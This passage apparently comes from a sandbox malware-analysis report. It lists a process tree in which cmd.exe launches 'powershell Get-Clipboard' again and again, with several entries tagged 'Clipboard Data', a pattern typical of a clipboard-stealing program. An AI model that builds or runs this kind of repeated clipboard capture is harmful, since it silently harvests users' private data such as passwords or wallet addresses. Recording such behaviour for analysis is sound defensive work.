  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:3356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5044
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4028
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:688
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:2196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:2196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:4900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:4984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4572
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:452
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:2140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4216
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:2376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4416
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4404
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:1940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2624
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:1668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:4740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1624
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2444
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:4536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  - Clipboard Data
  PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4468
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1912
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1412
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:2172
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:5020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4184
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:796
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:4592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Clipboard Data
    PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:3360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
